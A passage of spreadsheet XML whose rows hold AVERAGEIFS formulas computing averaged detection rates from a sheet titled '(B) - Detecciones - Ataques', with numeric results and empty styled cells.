      <c r="K178" s="512"/>
      <c r="L178" s="512"/>
      <c r="M178" s="512"/>
      <c r="N178" s="512"/>
      <c r="O178" s="278"/>
      <c r="Q178" s="271"/>
      <c r="R178" s="510"/>
      <c r="S178" s="510"/>
      <c r="T178" s="510"/>
      <c r="U178" s="510"/>
      <c r="V178" s="510"/>
      <c r="W178" s="510"/>
      <c r="X178" s="271"/>
      <c r="Y178" s="271"/>
      <c r="Z178" s="271"/>
      <c r="AA178" s="271"/>
      <c r="AB178" s="271"/>
      <c r="AC178" s="271"/>
      <c r="AD178" s="271"/>
      <c r="AE178" s="271"/>
      <c r="AF178" s="271"/>
      <c r="AG178" s="271"/>
      <c r="AH178" s="352" t="s">
        <v>1040</v>
      </c>
      <c r="AI178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AJ178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3521052632</v>
      </c>
      <c r="AK178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3521052632</v>
      </c>
      <c r="AL178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AM178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AN178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3473684211</v>
      </c>
      <c r="AO178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3552631579</v>
      </c>
      <c r="AP178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3657894737</v>
      </c>
      <c r="AQ178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3526315789</v>
      </c>
      <c r="AS178" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3578947368</v>
      </c>
      <c r="AT178" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3684210526</v>
      </c>
      <c r="AU178" s="512"/>
      <c r="AV178" s="512"/>
      <c r="AW178" s="512"/>
      <c r="AX178" s="512"/>
      <c r="AY178" s="512"/>
      <c r="AZ178" s="512"/>
      <c r="BA178" s="512"/>
      <c r="BB178" s="512"/>
      <c r="BC178" s="512"/>
      <c r="BD178" s="512"/>
      <c r="BE178" s="512"/>
      <c r="BF178" s="512"/>
      <c r="BG178" s="512"/>
      <c r="BH178" s="512"/>
      <c r="BI178" s="512"/>
      <c r="BJ178" s="512"/>
      <c r="BK178" s="512"/>
      <c r="BL178" s="512"/>
      <c r="BM178" s="512"/>
      <c r="BN178" s="512"/>
      <c r="BO178" s="512"/>
      <c r="BP178" s="512"/>
      <c r="BQ178" s="512"/>
      <c r="BR178" s="512"/>
      <c r="BS178" s="512"/>
      <c r="BT178" s="512"/>
      <c r="BU178" s="512"/>
      <c r="BV178" s="512"/>
      <c r="BW178" s="512"/>
      <c r="BX178" s="512"/>
      <c r="BY178" s="512"/>
      <c r="BZ178" s="512"/>
      <c r="CA178" s="512"/>
      <c r="CB178" s="512"/>
      <c r="CC178" s="512"/>
      <c r="CD178" s="512"/>
      <c r="CE178" s="512"/>
      <c r="CF178" s="512"/>
      <c r="CG178" s="512"/>
      <c r="CH178" s="512"/>
      <c r="CI178" s="512"/>
      <c r="CJ178" s="512"/>
      <c r="CK178" s="512"/>
      <c r="CL178" s="512"/>
      <c r="CM178" s="512"/>
      <c r="CN178" s="512"/>
      <c r="CO178" s="512"/>
      <c r="CP178" s="512"/>
      <c r="CQ178" s="512"/>
      <c r="CR178" s="512"/>
      <c r="CS178" s="512"/>
      <c r="CT178" s="512"/>
      <c r="CU178" s="512"/>
      <c r="CV178" s="512"/>
      <c r="CW178" s="512"/>
      <c r="CX178" s="512"/>
      <c r="CY178" s="512"/>
      <c r="CZ178" s="512"/>
      <c r="DA178" s="512"/>
      <c r="DB178" s="512"/>
      <c r="DC178" s="512"/>
      <c r="DD178" s="512"/>
      <c r="DE178" s="512"/>
      <c r="DF178" s="512"/>
      <c r="DG178" s="512"/>
      <c r="DH178" s="512"/>
      <c r="DI178" s="512"/>
      <c r="DJ178" s="512"/>
      <c r="DK178" s="271"/>
    </row>
    <row r="179">
      <c r="J179" s="277"/>
      <c r="K179" s="512"/>
      <c r="L179" s="512"/>
      <c r="M179" s="512"/>
      <c r="N179" s="512"/>
      <c r="O179" s="278"/>
      <c r="Q179" s="271"/>
      <c r="R179" s="510"/>
      <c r="S179" s="510"/>
      <c r="T179" s="510"/>
      <c r="U179" s="510"/>
      <c r="V179" s="510"/>
      <c r="W179" s="510"/>
      <c r="X179" s="271"/>
      <c r="Y179" s="271"/>
      <c r="Z179" s="271"/>
      <c r="AA179" s="271"/>
      <c r="AB179" s="271"/>
      <c r="AC179" s="271"/>
      <c r="AD179" s="271"/>
      <c r="AE179" s="271"/>
      <c r="AF179" s="271"/>
      <c r="AG179" s="271"/>
      <c r="AH179" s="352" t="s">
        <v>1012</v>
      </c>
      <c r="AI179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AK179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AL179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AM179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AN179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AO179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AP179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AQ179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AR179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS179" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AT179" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AU179" s="512"/>
      <c r="AV179" s="512"/>
      <c r="AW179" s="512"/>
      <c r="AX179" s="512"/>
      <c r="AY179" s="512"/>
      <c r="AZ179" s="512"/>
      <c r="BA179" s="512"/>
      <c r="BB179" s="512"/>
      <c r="BC179" s="512"/>
      <c r="BD179" s="512"/>
      <c r="BE179" s="512"/>
      <c r="BF179" s="512"/>
      <c r="BG179" s="512"/>
      <c r="BH179" s="512"/>
      <c r="BI179" s="512"/>
      <c r="BJ179" s="512"/>
      <c r="BK179" s="512"/>
      <c r="BL179" s="512"/>
      <c r="BM179" s="512"/>
      <c r="BN179" s="512"/>
      <c r="BO179" s="512"/>
      <c r="BP179" s="512"/>
      <c r="BQ179" s="512"/>
      <c r="BR179" s="512"/>
      <c r="BS179" s="512"/>
      <c r="BT179" s="512"/>
      <c r="BU179" s="512"/>
      <c r="BV179" s="512"/>
      <c r="BW179" s="512"/>
      <c r="BX179" s="512"/>
      <c r="BY179" s="512"/>
      <c r="BZ179" s="512"/>
      <c r="CA179" s="512"/>
      <c r="CB179" s="512"/>
      <c r="CC179" s="512"/>
      <c r="CD179" s="512"/>
      <c r="CE179" s="512"/>
      <c r="CF179" s="512"/>
      <c r="CG179" s="512"/>
      <c r="CH179" s="512"/>
      <c r="CI179" s="512"/>
      <c r="CJ179" s="512"/>
      <c r="CK179" s="512"/>
      <c r="CL179" s="512"/>
      <c r="CM179" s="512"/>
      <c r="CN179" s="512"/>
      <c r="CO179" s="512"/>
      <c r="CP179" s="512"/>
      <c r="CQ179" s="512"/>
      <c r="CR179" s="512"/>
      <c r="CS179" s="512"/>
      <c r="CT179" s="512"/>
      <c r="CU179" s="512"/>
      <c r="CV179" s="512"/>
      <c r="CW179" s="512"/>
      <c r="CX179" s="512"/>
      <c r="CY179" s="512"/>
      <c r="CZ179" s="512"/>
      <c r="DA179" s="512"/>
      <c r="DB179" s="512"/>
      <c r="DC179" s="512"/>
      <c r="DD179" s="512"/>
      <c r="DE179" s="512"/>
      <c r="DF179" s="512"/>
      <c r="DG179" s="512"/>
      <c r="DH179" s="512"/>
      <c r="DI179" s="512"/>
      <c r="DJ179" s="512"/>
      <c r="DK179" s="271"/>
    </row>
    <row r="180">
      <c r="J180" s="277"/>
      <c r="K180" s="512"/>
      <c r="L180" s="512"/>
      <c r="M180" s="512"/>
      <c r="N180" s="512"/>
      <c r="O180" s="278"/>
      <c r="Q180" s="271"/>
      <c r="R180" s="510"/>
      <c r="S180" s="510"/>
      <c r="T180" s="510"/>
      <c r="U180" s="510"/>
      <c r="V180" s="510"/>
      <c r="W180" s="510"/>
      <c r="X180" s="271"/>
      <c r="Y180" s="271"/>
      <c r="Z180" s="271"/>
      <c r="AA180" s="271"/>
      <c r="AB180" s="271"/>
      <c r="AC180" s="271"/>
      <c r="AD180" s="271"/>
      <c r="AE180" s="271"/>
      <c r="AF180" s="271"/>
      <c r="AG180" s="271"/>
      <c r="AH180" s="352" t="s">
        <v>1164</v>
      </c>
      <c r="AI180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS180" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT180" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU180" s="512"/>
      <c r="AV180" s="512"/>
      <c r="AW180" s="512"/>
      <c r="AX180" s="512"/>
      <c r="AY180" s="512"/>
      <c r="AZ180" s="512"/>
      <c r="BA180" s="512"/>
      <c r="BB180" s="512"/>
      <c r="BC180" s="512"/>
      <c r="BD180" s="512"/>
      <c r="BE180" s="512"/>
      <c r="BF180" s="512"/>
      <c r="BG180" s="512"/>
      <c r="BH180" s="512"/>
      <c r="BI180" s="512"/>
      <c r="BJ180" s="512"/>
      <c r="BK180" s="512"/>
      <c r="BL180" s="512"/>
      <c r="BM180" s="512"/>
      <c r="BN180" s="512"/>
      <c r="BO180" s="512"/>
      <c r="BP180" s="512"/>
      <c r="BQ180" s="512"/>
      <c r="BR180" s="512"/>
      <c r="BS180" s="512"/>
      <c r="BT180" s="512"/>
      <c r="BU180" s="512"/>
      <c r="BV180" s="512"/>
      <c r="BW180" s="512"/>
      <c r="BX180" s="512"/>
      <c r="BY180" s="512"/>
      <c r="BZ180" s="512"/>
      <c r="CA180" s="512"/>
      <c r="CB180" s="512"/>
      <c r="CC180" s="512"/>
      <c r="CD180" s="512"/>
      <c r="CE180" s="512"/>
      <c r="CF180" s="512"/>
      <c r="CG180" s="512"/>
      <c r="CH180" s="512"/>
      <c r="CI180" s="512"/>
      <c r="CJ180" s="512"/>
      <c r="CK180" s="512"/>
      <c r="CL180" s="512"/>
      <c r="CM180" s="512"/>
      <c r="CN180" s="512"/>
      <c r="CO180" s="512"/>
      <c r="CP180" s="512"/>
      <c r="CQ180" s="512"/>
      <c r="CR180" s="512"/>
      <c r="CS180" s="512"/>
      <c r="CT180" s="512"/>
      <c r="CU180" s="512"/>
      <c r="CV180" s="512"/>
      <c r="CW180" s="512"/>
      <c r="CX180" s="512"/>
      <c r="CY180" s="512"/>
      <c r="CZ180" s="512"/>
      <c r="DA180" s="512"/>
      <c r="DB180" s="512"/>
      <c r="DC180" s="512"/>
      <c r="DD180" s="512"/>
      <c r="DE180" s="512"/>
      <c r="DF180" s="512"/>
      <c r="DG180" s="512"/>
      <c r="DH180" s="512"/>
      <c r="DI180" s="512"/>
      <c r="DJ180" s="512"/>
      <c r="DK180" s="271"/>
    </row>
    <row r="181">
      <c r="J181" s="468"/>
      <c r="K181" s="550"/>
      <c r="L181" s="550"/>
      <c r="M181" s="550"/>
      <c r="N181" s="550"/>
      <c r="O181" s="470"/>
      <c r="Q181" s="271"/>
      <c r="R181" s="510"/>
      <c r="S181" s="510"/>
      <c r="T181" s="510"/>
      <c r="U181" s="510"/>
      <c r="V181" s="510"/>
      <c r="W181" s="510"/>
      <c r="X181" s="271"/>
      <c r="Y181" s="271"/>
      <c r="Z181" s="271"/>
      <c r="AA181" s="271"/>
      <c r="AB181" s="271"/>
      <c r="AC181" s="271"/>
      <c r="AD181" s="271"/>
      <c r="AE181" s="271"/>
      <c r="AF181" s="271"/>
      <c r="AG181" s="271"/>
      <c r="AH181" s="352" t="s">
        <v>1848</v>
      </c>
      <c r="AI181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AK181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AL181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AM181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AN181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AO181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AP181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AR181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AS181" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AT181" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU181" s="512"/>
      <c r="AV181" s="512"/>
      <c r="AW181" s="512"/>
      <c r="AX181" s="512"/>
      <c r="AY181" s="512"/>
      <c r="AZ181" s="512"/>
      <c r="BA181" s="512"/>
      <c r="BB181" s="512"/>
      <c r="BC181" s="512"/>
      <c r="BD181" s="512"/>
      <c r="BE181" s="512"/>
      <c r="BF181" s="512"/>
      <c r="BG181" s="512"/>
      <c r="BH181" s="512"/>
      <c r="BI181" s="512"/>
      <c r="BJ181" s="512"/>
      <c r="BK181" s="512"/>
      <c r="BL181" s="512"/>
      <c r="BM181" s="512"/>
      <c r="BN181" s="512"/>
      <c r="BO181" s="512"/>
      <c r="BP181" s="512"/>
      <c r="BQ181" s="512"/>
      <c r="BR181" s="512"/>
      <c r="BS181" s="512"/>
      <c r="BT181" s="512"/>
      <c r="BU181" s="512"/>
      <c r="BV181" s="512"/>
      <c r="BW181" s="512"/>
      <c r="BX181" s="512"/>
      <c r="BY181" s="512"/>
      <c r="BZ181" s="512"/>
      <c r="CA181" s="512"/>
      <c r="CB181" s="512"/>
      <c r="CC181" s="512"/>
      <c r="CD181" s="512"/>
      <c r="CE181" s="512"/>
      <c r="CF181" s="512"/>
      <c r="CG181" s="512"/>
      <c r="CH181" s="512"/>
      <c r="CI181" s="512"/>
      <c r="CJ181" s="512"/>
      <c r="CK181" s="512"/>
      <c r="CL181" s="512"/>
      <c r="CM181" s="512"/>
      <c r="CN181" s="512"/>
      <c r="CO181" s="512"/>
      <c r="CP181" s="512"/>
      <c r="CQ181" s="512"/>
      <c r="CR181" s="512"/>
      <c r="CS181" s="512"/>
      <c r="CT181" s="512"/>
      <c r="CU181" s="512"/>
      <c r="CV181" s="512"/>
      <c r="CW181" s="512"/>
      <c r="CX181" s="512"/>
      <c r="CY181" s="512"/>
      <c r="CZ181" s="512"/>
      <c r="DA181" s="512"/>
      <c r="DB181" s="512"/>
      <c r="DC181" s="512"/>
      <c r="DD181" s="512"/>
      <c r="DE181" s="512"/>
      <c r="DF181" s="512"/>
      <c r="DG181" s="512"/>
      <c r="DH181" s="512"/>
      <c r="DI181" s="512"/>
      <c r="DJ181" s="512"/>
      <c r="DK181" s="271"/>
    </row>
    <row r="182">
      <c r="K182" s="173"/>
      <c r="L182" s="173"/>
      <c r="M182" s="173"/>
      <c r="N182" s="173"/>
      <c r="Q182" s="271"/>
      <c r="R182" s="510"/>
      <c r="S182" s="510"/>
      <c r="T182" s="510"/>
      <c r="U182" s="510"/>
      <c r="V182" s="510"/>
      <c r="W182" s="510"/>
      <c r="X182" s="271"/>
      <c r="Y182" s="271"/>
      <c r="Z182" s="271"/>
      <c r="AA182" s="271"/>
      <c r="AB182" s="271"/>
      <c r="AC182" s="271"/>
      <c r="AD182" s="271"/>
      <c r="AE182" s="271"/>
      <c r="AF182" s="271"/>
      <c r="AG182" s="271"/>
      <c r="AH182" s="352" t="s">
        <v>2300</v>
      </c>
      <c r="AI182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AK182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AL182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AM182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AN182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AO182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AP182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AR182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AS182" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AT182" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AU182" s="512"/>
      <c r="AV182" s="512"/>
      <c r="AW182" s="512"/>
      <c r="AX182" s="512"/>
      <c r="AY182" s="512"/>
      <c r="AZ182" s="512"/>
      <c r="BA182" s="512"/>
      <c r="BB182" s="512"/>
      <c r="BC182" s="512"/>
      <c r="BD182" s="512"/>
      <c r="BE182" s="512"/>
      <c r="BF182" s="512"/>
      <c r="BG182" s="512"/>
      <c r="BH182" s="512"/>
      <c r="BI182" s="512"/>
      <c r="BJ182" s="512"/>
      <c r="BK182" s="512"/>
      <c r="BL182" s="512"/>
      <c r="BM182" s="512"/>
      <c r="BN182" s="512"/>
      <c r="BO182" s="512"/>
      <c r="BP182" s="512"/>
      <c r="BQ182" s="512"/>
      <c r="BR182" s="512"/>
      <c r="BS182" s="512"/>
      <c r="BT182" s="512"/>
      <c r="BU182" s="512"/>
      <c r="BV182" s="512"/>
      <c r="BW182" s="512"/>
      <c r="BX182" s="512"/>
      <c r="BY182" s="512"/>
      <c r="BZ182" s="512"/>
      <c r="CA182" s="512"/>
      <c r="CB182" s="512"/>
      <c r="CC182" s="512"/>
      <c r="CD182" s="512"/>
      <c r="CE182" s="512"/>
      <c r="CF182" s="512"/>
      <c r="CG182" s="512"/>
      <c r="CH182" s="512"/>
      <c r="CI182" s="512"/>
      <c r="CJ182" s="512"/>
      <c r="CK182" s="512"/>
      <c r="CL182" s="512"/>
      <c r="CM182" s="512"/>
      <c r="CN182" s="512"/>
      <c r="CO182" s="512"/>
      <c r="CP182" s="512"/>
      <c r="CQ182" s="512"/>
      <c r="CR182" s="512"/>
      <c r="CS182" s="512"/>
      <c r="CT182" s="512"/>
      <c r="CU182" s="512"/>
      <c r="CV182" s="512"/>
      <c r="CW182" s="512"/>
      <c r="CX182" s="512"/>
      <c r="CY182" s="512"/>
      <c r="CZ182" s="512"/>
      <c r="DA182" s="512"/>
      <c r="DB182" s="512"/>
      <c r="DC182" s="512"/>
      <c r="DD182" s="512"/>
      <c r="DE182" s="512"/>
      <c r="DF182" s="512"/>
      <c r="DG182" s="512"/>
      <c r="DH182" s="512"/>
      <c r="DI182" s="512"/>
      <c r="DJ182" s="512"/>
      <c r="DK182" s="271"/>
    </row>
    <row r="183">
      <c r="K183" s="173"/>
      <c r="L183" s="551" t="s">
        <v>2616</v>
      </c>
      <c r="N183" s="173"/>
      <c r="Q183" s="271"/>
      <c r="R183" s="510"/>
      <c r="S183" s="510"/>
      <c r="T183" s="510"/>
      <c r="U183" s="510"/>
      <c r="V183" s="510"/>
      <c r="W183" s="510"/>
      <c r="X183" s="271"/>
      <c r="Y183" s="271"/>
      <c r="Z183" s="271"/>
      <c r="AA183" s="271"/>
